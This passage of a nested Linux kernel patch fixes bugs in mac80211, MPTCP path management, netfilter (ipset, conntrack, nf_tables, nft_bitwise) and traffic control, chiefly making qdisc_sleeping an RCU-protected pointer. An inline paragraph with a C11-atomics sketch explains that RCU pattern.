++	if (!he_cap_ie)
+ 		return;
+ 
+-	own_he_cap = sband->iftype_data->he_cap;
++	own_he_cap_ptr =
++		ieee80211_get_he_iftype_cap(sband,
++					    ieee80211_vif_type_p2p(&sdata->vif));
++	if (!own_he_cap_ptr)
++		return;
++
++	own_he_cap = *own_he_cap_ptr;
+ 
+ 	/* Make sure size is OK */
+ 	mcs_nss_size = ieee80211_he_mcs_nss_size(he_cap_ie_elem);
+diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c
+index 0125b3e6175b7..dc9e7eb7dd857 100644
+--- a/net/mac80211/mlme.c
++++ b/net/mac80211/mlme.c
+@@ -1143,6 +1143,7 @@ static void ieee80211_add_non_inheritance_elem(struct sk_buff *skb,
+ 					       const u16 *inner)
+ {
+ 	unsigned int skb_len = skb->len;
++	bool at_extension = false;
+ 	bool added = false;
+ 	int i, j;
+ 	u8 *len, *list_len = NULL;
+@@ -1154,7 +1155,6 @@ static void ieee80211_add_non_inheritance_elem(struct sk_buff *skb,
+ 	for (i = 0; i < PRESENT_ELEMS_MAX && outer[i]; i++) {
+ 		u16 elem = outer[i];
+ 		bool have_inner = false;
+-		bool at_extension = false;
+ 
+ 		/* should at least be sorted in the sense of normal -> ext */
+ 		WARN_ON(at_extension && elem < PRESENT_ELEM_EXT_OFFS);
+@@ -1183,8 +1183,14 @@ static void ieee80211_add_non_inheritance_elem(struct sk_buff *skb,
+ 		}
+ 		*list_len += 1;
+ 		skb_put_u8(skb, (u8)elem);
++		added = true;
+ 	}
+ 
++	/* if we added a list but no extension list, make a zero-len one */
++	if (added && (!at_extension || !list_len))
++		skb_put_u8(skb, 0);
++
++	/* if nothing was added, remove the extension element completely */
+ 	if (!added)
+ 		skb_trim(skb, skb_len);
+ 	else
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index 44e407e1a14c7..0f81492da0b46 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -4857,7 +4857,9 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 	}
+ 
+ 	if (unlikely(rx->sta && rx->sta->sta.mlo) &&
+-	    is_unicast_ether_addr(hdr->addr1)) {
++	    is_unicast_ether_addr(hdr->addr1) &&
++	    !ieee80211_is_probe_resp(hdr->frame_control) &&
++	    !ieee80211_is_beacon(hdr->frame_control)) {
+ 		/* translate to MLD addresses */
+ 		if (ether_addr_equal(link->conf->addr, hdr->addr1))
+ 			ether_addr_copy(hdr->addr1, rx->sdata->vif.addr);
+diff --git a/net/mptcp/pm.c b/net/mptcp/pm.c
+index 70f0ced3ca86e..10c288a0cb0c2 100644
+--- a/net/mptcp/pm.c
++++ b/net/mptcp/pm.c
+@@ -87,8 +87,15 @@ bool mptcp_pm_allow_new_subflow(struct mptcp_sock *msk)
+ 	unsigned int subflows_max;
+ 	int ret = 0;
+ 
+-	if (mptcp_pm_is_userspace(msk))
+-		return mptcp_userspace_pm_active(msk);
++	if (mptcp_pm_is_userspace(msk)) {
++		if (mptcp_userspace_pm_active(msk)) {
++			spin_lock_bh(&pm->lock);
++			pm->subflows++;
++			spin_unlock_bh(&pm->lock);
++			return true;
++		}
++		return false;
++	}
+ 
+ 	subflows_max = mptcp_pm_get_subflows_max(msk);
+ 
+@@ -181,8 +188,16 @@ void mptcp_pm_subflow_check_next(struct mptcp_sock *msk, const struct sock *ssk,
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 	bool update_subflows;
+ 
+-	update_subflows = (subflow->request_join || subflow->mp_join) &&
+-			  mptcp_pm_is_kernel(msk);
++	update_subflows = subflow->request_join || subflow->mp_join;
++	if (mptcp_pm_is_userspace(msk)) {
++		if (update_subflows) {
++			spin_lock_bh(&pm->lock);
++			pm->subflows--;
++			spin_unlock_bh(&pm->lock);
++		}
++		return;
++	}
++
+ 	if (!READ_ONCE(pm->work_pending) && !update_subflows)
+ 		return;
+ 
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 1c69e476f4ad6..01d34ee4525ea 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -1550,6 +1550,24 @@ static int mptcp_nl_cmd_del_addr(struct sk_buff *skb, struct genl_info *info)
+ 	return ret;
+ }
+ 
++void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list)
++{
++	struct mptcp_rm_list alist = { .nr = 0 };
++	struct mptcp_pm_addr_entry *entry;
++
++	list_for_each_entry(entry, rm_list, list) {
++		remove_anno_list_by_saddr(msk, &entry->addr);
++		if (alist.nr < MPTCP_RM_IDS_MAX)
++			alist.ids[alist.nr++] = entry->addr.id;
++	}
++
++	if (alist.nr) {
++		spin_lock_bh(&msk->pm.lock);
++		mptcp_pm_remove_addr(msk, &alist);
++		spin_unlock_bh(&msk->pm.lock);
++	}
++}
++
+ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 					struct list_head *rm_list)
+ {
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index c1d6cd5b188c2..8a2aa63caa51f 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -69,6 +69,7 @@ int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
+ 							MPTCP_PM_MAX_ADDR_ID + 1,
+ 							1);
+ 		list_add_tail_rcu(&e->list, &msk->pm.userspace_pm_local_addr_list);
++		msk->pm.local_addr_used++;
+ 		ret = e->addr.id;
+ 	} else if (match) {
+ 		ret = entry->addr.id;
+@@ -78,6 +79,31 @@ int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
+ 	return ret;
+ }
+ 
++/* If the subflow is closed from the other peer (not via a
++ * subflow destroy command), we want to keep the entry so as
++ * not to assign the same ID to another address and to be
++ * able to send RM_ADDR after the removal of the subflow.
++ */
++static int mptcp_userspace_pm_delete_local_addr(struct mptcp_sock *msk,
++						struct mptcp_pm_addr_entry *addr)
++{
++	struct mptcp_pm_addr_entry *entry, *tmp;
++
++	list_for_each_entry_safe(entry, tmp, &msk->pm.userspace_pm_local_addr_list, list) {
++		if (mptcp_addresses_equal(&entry->addr, &addr->addr, false)) {
++			/* TODO: a refcount is needed because the entry can
++			 * be used multiple times (e.g. fullmesh mode).
++			 */
++			list_del_rcu(&entry->list);
++			kfree(entry);
++			msk->pm.local_addr_used--;
++			return 0;
++		}
++	}
++
++	return -EINVAL;
++}
++
+ int mptcp_userspace_pm_get_flags_and_ifindex_by_id(struct mptcp_sock *msk,
+ 						   unsigned int id,
+ 						   u8 *flags, int *ifindex)
+@@ -170,6 +196,7 @@ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+ 	spin_lock_bh(&msk->pm.lock);
+ 
+ 	if (mptcp_pm_alloc_anno_list(msk, &addr_val)) {
++		msk->pm.add_addr_signaled++;
+ 		mptcp_pm_announce_addr(msk, &addr_val.addr, false);
+ 		mptcp_pm_nl_addr_send_ack(msk);
+ 	}
+@@ -231,7 +258,7 @@ int mptcp_nl_cmd_remove(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	list_move(&match->list, &free_list);
+ 
+-	mptcp_pm_remove_addrs_and_subflows(msk, &free_list);
++	mptcp_pm_remove_addrs(msk, &free_list);
+ 
+ 	release_sock((struct sock *)msk);
+ 
+@@ -250,6 +277,7 @@ int mptcp_nl_cmd_sf_create(struct sk_buff *skb, struct genl_info *info)
+ 	struct nlattr *raddr = info->attrs[MPTCP_PM_ATTR_ADDR_REMOTE];
+ 	struct nlattr *token = info->attrs[MPTCP_PM_ATTR_TOKEN];
+ 	struct nlattr *laddr = info->attrs[MPTCP_PM_ATTR_ADDR];
++	struct mptcp_pm_addr_entry local = { 0 };
+ 	struct mptcp_addr_info addr_r;
+ 	struct mptcp_addr_info addr_l;
+ 	struct mptcp_sock *msk;
+@@ -301,12 +329,26 @@ int mptcp_nl_cmd_sf_create(struct sk_buff *skb, struct genl_info *info)
+ 		goto create_err;
+ 	}
+ 
++	local.addr = addr_l;
++	err = mptcp_userspace_pm_append_new_local_addr(msk, &local);
++	if (err < 0) {
++		GENL_SET_ERR_MSG(info, "did not match address and id");
++		goto create_err;
++	}
++
+ 	lock_sock(sk);
+ 
+ 	err = __mptcp_subflow_connect(sk, &addr_l, &addr_r);
+ 
+ 	release_sock(sk);
+ 
++	spin_lock_bh(&msk->pm.lock);
++	if (err)
++		mptcp_userspace_pm_delete_local_addr(msk, &local);
++	else
++		msk->pm.subflows++;
++	spin_unlock_bh(&msk->pm.lock);
++
+  create_err:
+ 	sock_put((struct sock *)msk);
+ 	return err;
+@@ -419,7 +461,11 @@ int mptcp_nl_cmd_sf_destroy(struct sk_buff *skb, struct genl_info *info)
+ 	ssk = mptcp_nl_find_ssk(msk, &addr_l, &addr_r);
+ 	if (ssk) {
+ 		struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
++		struct mptcp_pm_addr_entry entry = { .addr = addr_l };
+ 
++		spin_lock_bh(&msk->pm.lock);
++		mptcp_userspace_pm_delete_local_addr(msk, &entry);
++		spin_unlock_bh(&msk->pm.lock);
+ 		mptcp_subflow_shutdown(sk, ssk, RCV_SHUTDOWN | SEND_SHUTDOWN);
+ 		mptcp_close_ssk(sk, ssk, subflow);
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_RMSUBFLOW);
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 55fc5e42082e0..fc00dd587a297 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -820,6 +820,7 @@ int mptcp_pm_announce_addr(struct mptcp_sock *msk,
+ 			   bool echo);
+ int mptcp_pm_remove_addr(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_list);
+ int mptcp_pm_remove_subflow(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_list);
++void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list);
+ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 					struct list_head *rm_list);
+ 
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index 46ebee9400dab..9a6b64779e644 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -1694,6 +1694,14 @@ call_ad(struct net *net, struct sock *ctnl, struct sk_buff *skb,
+ 	bool eexist = flags & IPSET_FLAG_EXIST, retried = false;
+ 
+ 	do {
++		if (retried) {
++			__ip_set_get(set);
++			nfnl_unlock(NFNL_SUBSYS_IPSET);
++			cond_resched();
++			nfnl_lock(NFNL_SUBSYS_IPSET);
++			__ip_set_put(set);
++		}
++
+ 		ip_set_lock(set);
+ 		ret = set->variant->uadt(set, tb, adt, &lineno, flags, retried);
+ 		ip_set_unlock(set);
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index a0e9c7af08467..7960262966094 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -2277,6 +2277,9 @@ static int nf_confirm_cthelper(struct sk_buff *skb, struct nf_conn *ct,
+ 		return 0;
+ 
+ 	helper = rcu_dereference(help->helper);
++	if (!helper)
++		return 0;
++
+ 	if (!(helper->flags & NF_CT_HELPER_F_USERSPACE))
+ 		return 0;
+ 
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 31775d54f4b40..437891cb8c417 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -8723,7 +8723,7 @@ static int nf_tables_commit_chain_prepare(struct net *net, struct nft_chain *cha
+ 				continue;
+ 			}
+ 
+-			if (WARN_ON_ONCE(data + expr->ops->size > data_boundary))
++			if (WARN_ON_ONCE(data + size + expr->ops->size > data_boundary))
+ 				return -ENOMEM;
+ 
+ 			memcpy(data + size, expr, expr->ops->size);
+diff --git a/net/netfilter/nft_bitwise.c b/net/netfilter/nft_bitwise.c
+index e6e402b247d09..b84312df9aa1e 100644
+--- a/net/netfilter/nft_bitwise.c
++++ b/net/netfilter/nft_bitwise.c
+@@ -322,7 +322,7 @@ static bool nft_bitwise_reduce(struct nft_regs_track *track,
+ 	dreg = priv->dreg;
+ 	regcount = DIV_ROUND_UP(priv->len, NFT_REG32_SIZE);
+ 	for (i = 0; i < regcount; i++, dreg++)
+-		track->regs[priv->dreg].bitwise = expr;
++		track->regs[dreg].bitwise = expr;
+ 
+ 	return false;
+ }
+diff --git a/net/sched/act_police.c b/net/sched/act_police.c
+index 0adb26e366a7b..94be21378e7ca 100644
+--- a/net/sched/act_police.c
++++ b/net/sched/act_police.c
+@@ -355,23 +355,23 @@ static int tcf_police_dump(struct sk_buff *skb, struct tc_action *a,
+ 	opt.burst = PSCHED_NS2TICKS(p->tcfp_burst);
+ 	if (p->rate_present) {
+ 		psched_ratecfg_getrate(&opt.rate, &p->rate);
+-		if ((police->params->rate.rate_bytes_ps >= (1ULL << 32)) &&
++		if ((p->rate.rate_bytes_ps >= (1ULL << 32)) &&
+ 		    nla_put_u64_64bit(skb, TCA_POLICE_RATE64,
+-				      police->params->rate.rate_bytes_ps,
++				      p->rate.rate_bytes_ps,
+ 				      TCA_POLICE_PAD))
+ 			goto nla_put_failure;
+ 	}
+ 	if (p->peak_present) {
+ 		psched_ratecfg_getrate(&opt.peakrate, &p->peak);
+-		if ((police->params->peak.rate_bytes_ps >= (1ULL << 32)) &&
++		if ((p->peak.rate_bytes_ps >= (1ULL << 32)) &&
+ 		    nla_put_u64_64bit(skb, TCA_POLICE_PEAKRATE64,
+-				      police->params->peak.rate_bytes_ps,
++				      p->peak.rate_bytes_ps,
+ 				      TCA_POLICE_PAD))
+ 			goto nla_put_failure;
+ 	}
+ 	if (p->pps_present) {
+ 		if (nla_put_u64_64bit(skb, TCA_POLICE_PKTRATE64,
+-				      police->params->ppsrate.rate_pkts_ps,
++				      p->ppsrate.rate_pkts_ps,
+ 				      TCA_POLICE_PAD))
+ 			goto nla_put_failure;
+ 		if (nla_put_u64_64bit(skb, TCA_POLICE_PKTBURST64,
+diff --git a/net/sched/cls_api.c b/net/sched/cls_api.c
+index 7b2aa04a7cdfd..abaf75300497d 100644
+--- a/net/sched/cls_api.c
++++ b/net/sched/cls_api.c
+@@ -41,8 +41,6 @@
+ #include <net/tc_act/tc_gate.h>
+ #include <net/flow_offload.h>
+ 
+-extern const struct nla_policy rtm_tca_policy[TCA_MAX + 1];
+-
+ /* The list of all installed classifier types */
+ static LIST_HEAD(tcf_proto_base);
+ 
+@@ -2782,6 +2780,7 @@ static int tc_chain_tmplt_add(struct tcf_chain *chain, struct net *net,
+ 		return PTR_ERR(ops);
+ 	if (!ops->tmplt_create || !ops->tmplt_destroy || !ops->tmplt_dump) {
+ 		NL_SET_ERR_MSG(extack, "Chain templates are not supported with specified classifier");
++		module_put(ops->owner);
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index f6a7b876d5954..6fb345ec22641 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -308,7 +308,7 @@ struct Qdisc *qdisc_lookup(struct net_device *dev, u32 handle)
+ 
+ 	if (dev_ingress_queue(dev))
+ 		q = qdisc_match_from_root(
+-			dev_ingress_queue(dev)->qdisc_sleeping,
++			rtnl_dereference(dev_ingress_queue(dev)->qdisc_sleeping),
+ 			handle);
+ out:
+ 	return q;
+@@ -327,7 +327,8 @@ struct Qdisc *qdisc_lookup_rcu(struct net_device *dev, u32 handle)
+ 
+ 	nq = dev_ingress_queue_rcu(dev);
+ 	if (nq)
+-		q = qdisc_match_from_root(nq->qdisc_sleeping, handle);
++		q = qdisc_match_from_root(rcu_dereference(nq->qdisc_sleeping),
++					  handle);
+ out:
+ 	return q;
+ }
+@@ -633,8 +634,13 @@ EXPORT_SYMBOL(qdisc_watchdog_init);
+ void qdisc_watchdog_schedule_range_ns(struct qdisc_watchdog *wd, u64 expires,
+ 				      u64 delta_ns)
+ {
+-	if (test_bit(__QDISC_STATE_DEACTIVATED,
+-		     &qdisc_root_sleeping(wd->qdisc)->state))
++	bool deactivated;
++
++	rcu_read_lock();
++	deactivated = test_bit(__QDISC_STATE_DEACTIVATED,
++			       &qdisc_root_sleeping(wd->qdisc)->state);
++	rcu_read_unlock();
++	if (deactivated)
+ 		return;
+ 
+ 	if (hrtimer_is_queued(&wd->timer)) {
+@@ -1473,7 +1479,7 @@ static int tc_get_qdisc(struct sk_buff *skb, struct nlmsghdr *n,
+ 				}
+ 				q = qdisc_leaf(p, clid);
+ 			} else if (dev_ingress_queue(dev)) {
+-				q = dev_ingress_queue(dev)->qdisc_sleeping;
++				q = rtnl_dereference(dev_ingress_queue(dev)->qdisc_sleeping);
+ 			}
+ 		} else {
+ 			q = rtnl_dereference(dev->qdisc);
+@@ -1559,7 +1565,7 @@ replay:
+ 				}
+ 				q = qdisc_leaf(p, clid);
+ 			} else if (dev_ingress_queue_create(dev)) {
+-				q = dev_ingress_queue(dev)->qdisc_sleeping;
++				q = rtnl_dereference(dev_ingress_queue(dev)->qdisc_sleeping);
+ 			}
+ 		} else {
+ 			q = rtnl_dereference(dev->qdisc);
+@@ -1800,8 +1806,8 @@ static int tc_dump_qdisc(struct sk_buff *skb, struct netlink_callback *cb)
+ 
+ 		dev_queue = dev_ingress_queue(dev);
+ 		if (dev_queue &&
+-		    tc_dump_qdisc_root(dev_queue->qdisc_sleeping, skb, cb,
+-				       &q_idx, s_q_idx, false,
++		    tc_dump_qdisc_root(rtnl_dereference(dev_queue->qdisc_sleeping),
++				       skb, cb, &q_idx, s_q_idx, false,
+ 				       tca[TCA_DUMP_INVISIBLE]) < 0)
+ 			goto done;
+ 
+@@ -2239,8 +2245,8 @@ static int tc_dump_tclass(struct sk_buff *skb, struct netlink_callback *cb)
+ 
+ 	dev_queue = dev_ingress_queue(dev);
+ 	if (dev_queue &&
+-	    tc_dump_tclass_root(dev_queue->qdisc_sleeping, skb, tcm, cb,
+-				&t, s_t, false) < 0)
++	    tc_dump_tclass_root(rtnl_dereference(dev_queue->qdisc_sleeping),
++				skb, tcm, cb, &t, s_t, false) < 0)
+ 		goto done;
+ 
+ done:
+diff --git a/net/sched/sch_fq_pie.c b/net/sched/sch_fq_pie.c
+index 6980796d435d9..591d87d5e5c0f 100644
+--- a/net/sched/sch_fq_pie.c
++++ b/net/sched/sch_fq_pie.c
+@@ -201,6 +201,11 @@ out:
+ 	return NET_XMIT_CN;
+ }
+ 
++static struct netlink_range_validation fq_pie_q_range = {
++	.min = 1,
++	.max = 1 << 20,
++};
++
+ static const struct nla_policy fq_pie_policy[TCA_FQ_PIE_MAX + 1] = {
+ 	[TCA_FQ_PIE_LIMIT]		= {.type = NLA_U32},
+ 	[TCA_FQ_PIE_FLOWS]		= {.type = NLA_U32},
+@@ -208,7 +213,8 @@ static const struct nla_policy fq_pie_policy[TCA_FQ_PIE_MAX + 1] = {
+ 	[TCA_FQ_PIE_TUPDATE]		= {.type = NLA_U32},
+ 	[TCA_FQ_PIE_ALPHA]		= {.type = NLA_U32},
+ 	[TCA_FQ_PIE_BETA]		= {.type = NLA_U32},
+-	[TCA_FQ_PIE_QUANTUM]		= {.type = NLA_U32},
++	[TCA_FQ_PIE_QUANTUM]		=
++			NLA_POLICY_FULL_RANGE(NLA_U32, &fq_pie_q_range),
+ 	[TCA_FQ_PIE_MEMORY_LIMIT]	= {.type = NLA_U32},
+ 	[TCA_FQ_PIE_ECN_PROB]		= {.type = NLA_U32},
+ 	[TCA_FQ_PIE_ECN]		= {.type = NLA_U32},
+@@ -373,6 +379,7 @@ static void fq_pie_timer(struct timer_list *t)
+ 	spinlock_t *root_lock; /* to lock qdisc for probability calculations */
+ 	u32 idx;
+ 
++	rcu_read_lock();
+ 	root_lock = qdisc_lock(qdisc_root_sleeping(sch));
+ 	spin_lock(root_lock);
+ 
+@@ -385,6 +392,7 @@ static void fq_pie_timer(struct timer_list *t)
+ 		mod_timer(&q->adapt_timer, jiffies + q->p_params.tupdate);
+ 
+ 	spin_unlock(root_lock);
++	rcu_read_unlock();
+ }
+ 
+ static int fq_pie_init(struct Qdisc *sch, struct nlattr *opt,
+diff --git a/net/sched/sch_generic.c b/net/sched/sch_generic.c
+index a9aadc4e68581..ee43e8ac039ed 100644
+--- a/net/sched/sch_generic.c
++++ b/net/sched/sch_generic.c
+@@ -648,7 +648,7 @@ struct Qdisc_ops noop_qdisc_ops __read_mostly = {
+ 
+ static struct netdev_queue noop_netdev_queue = {
+ 	RCU_POINTER_INITIALIZER(qdisc, &noop_qdisc),
+-	.qdisc_sleeping	=	&noop_qdisc,
++	RCU_POINTER_INITIALIZER(qdisc_sleeping, &noop_qdisc),
+ };
+ 
+ struct Qdisc noop_qdisc = {
+@@ -1103,7 +1103,7 @@ EXPORT_SYMBOL(qdisc_put_unlocked);
+ struct Qdisc *dev_graft_qdisc(struct netdev_queue *dev_queue,
+ 			      struct Qdisc *qdisc)
+ {
+-	struct Qdisc *oqdisc = dev_queue->qdisc_sleeping;
++	struct Qdisc *oqdisc = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	spinlock_t *root_lock;
+ 
+ 	root_lock = qdisc_lock(oqdisc);
+@@ -1112,7 +1112,7 @@ struct Qdisc *dev_graft_qdisc(struct netdev_queue *dev_queue,
+ 	/* ... and graft new one */
+ 	if (qdisc == NULL)
+ 		qdisc = &noop_qdisc;
+-	dev_queue->qdisc_sleeping = qdisc;
++	rcu_assign_pointer(dev_queue->qdisc_sleeping, qdisc);
+ 	rcu_assign_pointer(dev_queue->qdisc, &noop_qdisc);
+ 
+ 	spin_unlock_bh(root_lock);
+@@ -1125,12 +1125,12 @@ static void shutdown_scheduler_queue(struct net_device *dev,
+ 				     struct netdev_queue *dev_queue,
+ 				     void *_qdisc_default)
+ {
+-	struct Qdisc *qdisc = dev_queue->qdisc_sleeping;
++	struct Qdisc *qdisc = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	struct Qdisc *qdisc_default = _qdisc_default;
+ 
+ 	if (qdisc) {
+ 		rcu_assign_pointer(dev_queue->qdisc, qdisc_default);
+-		dev_queue->qdisc_sleeping = qdisc_default;
++		rcu_assign_pointer(dev_queue->qdisc_sleeping, qdisc_default);
+ 
+ 		qdisc_put(qdisc);
+ 	}
+@@ -1154,7 +1154,7 @@ static void attach_one_default_qdisc(struct net_device *dev,
+ 
+ 	if (!netif_is_multiqueue(dev))
+ 		qdisc->flags |= TCQ_F_ONETXQUEUE | TCQ_F_NOPARENT;
+-	dev_queue->qdisc_sleeping = qdisc;
++	rcu_assign_pointer(dev_queue->qdisc_sleeping, qdisc);
+ }
+ 
+ static void attach_default_qdiscs(struct net_device *dev)
+@@ -1167,7 +1167,7 @@ static void attach_default_qdiscs(struct net_device *dev)
+ 	if (!netif_is_multiqueue(dev) ||
+ 	    dev->priv_flags & IFF_NO_QUEUE) {
+ 		netdev_for_each_tx_queue(dev, attach_one_default_qdisc, NULL);
+-		qdisc = txq->qdisc_sleeping;
++		qdisc = rtnl_dereference(txq->qdisc_sleeping);
+ 		rcu_assign_pointer(dev->qdisc, qdisc);
+ 		qdisc_refcount_inc(qdisc);
+ 	} else {
+@@ -1186,7 +1186,7 @@ static void attach_default_qdiscs(struct net_device *dev)
+ 		netdev_for_each_tx_queue(dev, shutdown_scheduler_queue, &noop_qdisc);
+ 		dev->priv_flags |= IFF_NO_QUEUE;
+ 		netdev_for_each_tx_queue(dev, attach_one_default_qdisc, NULL);
+-		qdisc = txq->qdisc_sleeping;
++		qdisc = rtnl_dereference(txq->qdisc_sleeping);
+ 		rcu_assign_pointer(dev->qdisc, qdisc);
+ 		qdisc_refcount_inc(qdisc);
+ 		dev->priv_flags ^= IFF_NO_QUEUE;
+@@ -1202,7 +1202,7 @@ static void transition_one_qdisc(struct net_device *dev,
+ 				 struct netdev_queue *dev_queue,
+ 				 void *_need_watchdog)
+ {
+-	struct Qdisc *new_qdisc = dev_queue->qdisc_sleeping;
++	struct Qdisc *new_qdisc = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	int *need_watchdog_p = _need_watchdog;
+ 
+ 	if (!(new_qdisc->flags & TCQ_F_BUILTIN))
+@@ -1272,7 +1272,7 @@ static void dev_reset_queue(struct net_device *dev,
+ 	struct Qdisc *qdisc;
+ 	bool nolock;
+ 
+-	qdisc = dev_queue->qdisc_sleeping;
++	qdisc = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	if (!qdisc)
+ 		return;
+ 
+@@ -1303,7 +1303,7 @@ static bool some_qdisc_is_busy(struct net_device *dev)
+ 		int val;
+ 
+ 		dev_queue = netdev_get_tx_queue(dev, i);
+-		q = dev_queue->qdisc_sleeping;
++		q = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 
+ 		root_lock = qdisc_lock(q);
+ 		spin_lock_bh(root_lock);
+@@ -1379,7 +1379,7 @@ EXPORT_SYMBOL(dev_deactivate);
+ static int qdisc_change_tx_queue_len(struct net_device *dev,
+ 				     struct netdev_queue *dev_queue)
+ {
+-	struct Qdisc *qdisc = dev_queue->qdisc_sleeping;
++	struct Qdisc *qdisc = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	const struct Qdisc_ops *ops = qdisc->ops;
+ 
+ 	if (ops->change_tx_queue_len)
+@@ -1404,7 +1404,7 @@ void mq_change_real_num_tx(struct Qdisc *sch, unsigned int new_real_tx)
+ 	unsigned int i;
+ 
+ 	for (i = new_real_tx; i < dev->real_num_tx_queues; i++) {
+-		qdisc = netdev_get_tx_queue(dev, i)->qdisc_sleeping;
++		qdisc = rtnl_dereference(netdev_get_tx_queue(dev, i)->qdisc_sleeping);
+ 		/* Only update the default qdiscs we created,
+ 		 * qdiscs with handles are always hashed.
+ 		 */
+@@ -1412,7 +1412,7 @@ void mq_change_real_num_tx(struct Qdisc *sch, unsigned int new_real_tx)
+ 			qdisc_hash_del(qdisc);
+ 	}
+ 	for (i = dev->real_num_tx_queues; i < new_real_tx; i++) {
+-		qdisc = netdev_get_tx_queue(dev, i)->qdisc_sleeping;
++		qdisc = rtnl_dereference(netdev_get_tx_queue(dev, i)->qdisc_sleeping);
+ 		if (qdisc != &noop_qdisc && !qdisc->handle)
+ 			qdisc_hash_add(qdisc, false);
+ 	}
+@@ -1449,7 +1449,7 @@ static void dev_init_scheduler_queue(struct net_device *dev,
+ 	struct Qdisc *qdisc = _qdisc;
+ 
+ 	rcu_assign_pointer(dev_queue->qdisc, qdisc);
+-	dev_queue->qdisc_sleeping = qdisc;
++	rcu_assign_pointer(dev_queue->qdisc_sleeping, qdisc);
+ }
+ 
+ void dev_init_scheduler(struct net_device *dev)
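
All of the qdisc_sleeping hunks here and in the following scheduler
files implement one change: the field becomes an __rcu pointer,
published with rcu_assign_pointer() (a release store, so readers never
see a half-initialized qdisc) and read with rtnl_dereference(),
rcu_dereference(), or rcu_access_pointer() depending on what the caller
holds. A C11-atomics sketch of the publish/dereference discipline
(userspace analogue; names illustrative):

#include <stdatomic.h>
#include <stdlib.h>

struct qdisc_like { int handle; };

static _Atomic(struct qdisc_like *) sleeping;

/* like rcu_assign_pointer(): release store, so a reader that sees the
 * pointer also sees every prior initialization of *q */
static void publish(struct qdisc_like *q)
{
        atomic_store_explicit(&sleeping, q, memory_order_release);
}

/* like rcu_dereference(): acquire here stands in for the address
 * dependency ordering that RCU readers rely on */
static struct qdisc_like *deref(void)
{
        return atomic_load_explicit(&sleeping, memory_order_acquire);
}

int main(void)
{
        struct qdisc_like *q = malloc(sizeof(*q));

        q->handle = 0x8001;
        publish(q);
        return deref()->handle == 0x8001 ? 0 : 1;
}
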
+diff --git a/net/sched/sch_mq.c b/net/sched/sch_mq.c
+index d0bc660d7401f..c860119a8f091 100644
+--- a/net/sched/sch_mq.c
++++ b/net/sched/sch_mq.c
+@@ -141,7 +141,7 @@ static int mq_dump(struct Qdisc *sch, struct sk_buff *skb)
+ 	 * qdisc totals are added at end.
+ 	 */
+ 	for (ntx = 0; ntx < dev->num_tx_queues; ntx++) {
+-		qdisc = netdev_get_tx_queue(dev, ntx)->qdisc_sleeping;
++		qdisc = rtnl_dereference(netdev_get_tx_queue(dev, ntx)->qdisc_sleeping);
+ 		spin_lock_bh(qdisc_lock(qdisc));
+ 
+ 		gnet_stats_add_basic(&sch->bstats, qdisc->cpu_bstats,
+@@ -202,7 +202,7 @@ static struct Qdisc *mq_leaf(struct Qdisc *sch, unsigned long cl)
+ {
+ 	struct netdev_queue *dev_queue = mq_queue_get(sch, cl);
+ 
+-	return dev_queue->qdisc_sleeping;
++	return rtnl_dereference(dev_queue->qdisc_sleeping);
+ }
+ 
+ static unsigned long mq_find(struct Qdisc *sch, u32 classid)
+@@ -221,7 +221,7 @@ static int mq_dump_class(struct Qdisc *sch, unsigned long cl,
+ 
+ 	tcm->tcm_parent = TC_H_ROOT;
+ 	tcm->tcm_handle |= TC_H_MIN(cl);
+-	tcm->tcm_info = dev_queue->qdisc_sleeping->handle;
++	tcm->tcm_info = rtnl_dereference(dev_queue->qdisc_sleeping)->handle;
+ 	return 0;
+ }
+ 
+@@ -230,7 +230,7 @@ static int mq_dump_class_stats(struct Qdisc *sch, unsigned long cl,
+ {
+ 	struct netdev_queue *dev_queue = mq_queue_get(sch, cl);
+ 
+-	sch = dev_queue->qdisc_sleeping;
++	sch = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	if (gnet_stats_copy_basic(d, sch->cpu_bstats, &sch->bstats, true) < 0 ||
